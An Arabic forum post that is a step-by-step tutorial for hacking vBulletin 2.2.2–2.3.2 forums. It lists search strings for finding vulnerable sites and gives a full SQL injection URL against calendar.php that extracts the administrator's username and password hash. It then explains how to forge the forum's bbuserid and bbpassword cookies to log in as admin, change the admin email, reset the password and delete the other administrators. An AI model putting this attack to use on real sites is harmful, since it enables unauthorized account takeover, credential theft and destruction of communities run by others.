أختراق منتديات vBulletin بثغرة التقويم Calendar

[zaina]

السلام عليكم ورحمة الله وبركاته

اخواني الاعزاء

كيف حالكم اليوم؟؟

اليوم عندنا ثغرة قديمة لكن وضعتها للفائدة لمن لم يلحق بها بان يعرفها

ولكن حتى يخترق الموقع لازم كل واحد يكون عنده اصرار ويقول:

( أقسم بالله اني لا أخترق مواقع عربية ولا اسلامية الا في مصالح دينية )

طيب الحين نبدأ الشرح

اولا الكل يحمل برنامج الكوكيز المعروف Ceditor

أضغط هنا

ولقد تم شرحه في ثغرة آخر عشر مواضيع

طيب الحين ندخل على قوقل ونبحث عن احد هذي الاصدارات للمنتديات

powered by: vbulletin version 2.2.2
powered by: vbulletin version 2.2.3
powered by: vbulletin version 2.2.4
powered by: vbulletin version 2.2.5
powered by: vbulletin version 2.2.6
powered by: vbulletin version 2.2.7
powered by: vbulletin version 2.2.8
powered by: vbulletin version 2.2.9
powered by: vbulletin version 2.3.0
powered by: vbulletin version 2.3.1
powered by: vbulletin version 2.3.2

الحين اختار موقع وحط بعد رابطه هيك

calendar.php?action=edit&eventid=14%20union%

20select20userid,username,email ,'0000-0-

0',password,username%20from%20user%20where20userid =1


يعني بصير الموقع

http://www.xxx.com/xx/calendar.php?a...it&eventid=14%

20union%20select20userid,username,email ,'0000-0-

0',password,username%20from%20user%20where20userid =1



راح يطلع لك مكتوب تحت كذا

subject:admin

event information: password

راح يطلع لك بدال كلمة admin اسم المستخدم للمشرف العام

وبدال password بطلع لك كلمة مرور المشرف العام ولكن مشفرة

طيب الحين في بعض المواقع ما دخلك التقويم الا اذا سجلت فروح والله يعينك وسجل

وحتى لو مابدها تسجيل لازم تسجل

وبعدين سجل دخولك


طيب الحين نفتح برنامج الي نزلناه وروح على الكوكيز حق المنتدى

والمشكلة الحين ان البرنامج هذا مشروح قبل هيك بس علشان خاطر عيونكم

طيب الحين عند الكوكيز حق المنتدى بتلاقي قيمتان هما

البي بي يورز bbuserid
والقيمه الثانيه هي البي بي باسورد bbpassword


طيب الحين ندخل على ال bbuserid ونحط في *****e value الرقم 1

وبعدين save

طيب الحين نروح على bbpassword ونحط مكان *****e value الباسوورد المشفر الي طلع لنا

وبعدين save

والحين سكر كل الصفحات الي فاتحها

وادخل المنتدى

مبروووووووووك انت الحين المشرف العام

الحين روح لوحة التحكم وغير الايميل وحط ايميلك

بعدين سجل خروجك من المنتدى يعني تسجيل خروج

بعدين اطلب كلمة المرور كانك نسيتها

بعدين مبروك عليك المنتدى بالكامل!!!

وطبعا احذف كل المسؤلين عن المنتدى

والعب في المنتدى لعب

واي سؤال يلا انا فاضي ومنتظركم

وهذا والله أعلم

أخوكم في الله................
zaina